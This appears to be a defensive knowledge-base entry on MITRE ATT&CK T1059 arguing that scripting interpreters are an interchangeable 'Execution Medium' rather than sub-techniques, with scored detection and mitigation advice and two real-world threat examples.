Command and Scripting Interpreter
Execute attacker-controlled code via an interpreter available on the target system.
Why this is reclassified
The sub-techniques of T1059 (PowerShell, Bash, Python, VBScript, etc.) are Execution Mediums, not sub-techniques. An Execution Medium defines how a technique is triggered — the channel through which it is carried out. It is orthogonal to the technique itself: the same code execution can be triggered through any of these Execution Mediums, and switching Execution Medium does not change the technique being performed. Execution Medium–based detection rules have a hard ceiling of STP 3 because the attacker can switch Execution Medium while performing the same technique. These should be modelled in the Execution Medium dimension rather than as sub-techniques.
Medium
The interpreter used (PowerShell, Bash, Python, cmd.exe, etc.) is the Execution Medium, not the sub-technique. Detection rules scoped to a specific Execution Medium have a hard STP 3 ceiling.
Detect
Rules scoped to a specific interpreter have a hard STP 3 ceiling — the attacker switches Execution Medium. Rules targeting command content across all interpreters approach STP 5.
Target process.cmd_line content for suspicious patterns across all interpreter processes rather than filtering by process.file.path.
Mitigate
Blocking specific interpreters is STP 3 — the attacker switches Execution Medium. Application allowlisting operates closer to the technique level.
Application allowlisting (WDAC, AppLocker) is higher STP than blocking specific interpreters.
Seen in the wild2reports▼
Gamaredon's GammaWorm uses VBScript while GammaLoad layers PowerShell and bitsadmin — the persistence technique is unchanged across all three; only the Execution Medium differs.
ClickFix lures victims into running PowerShell or mshta.exe via the Windows Run dialog — Execution Medium is attacker-chosen and interchangeable, illustrating the reclassification of T1059 from technique to medium dimension.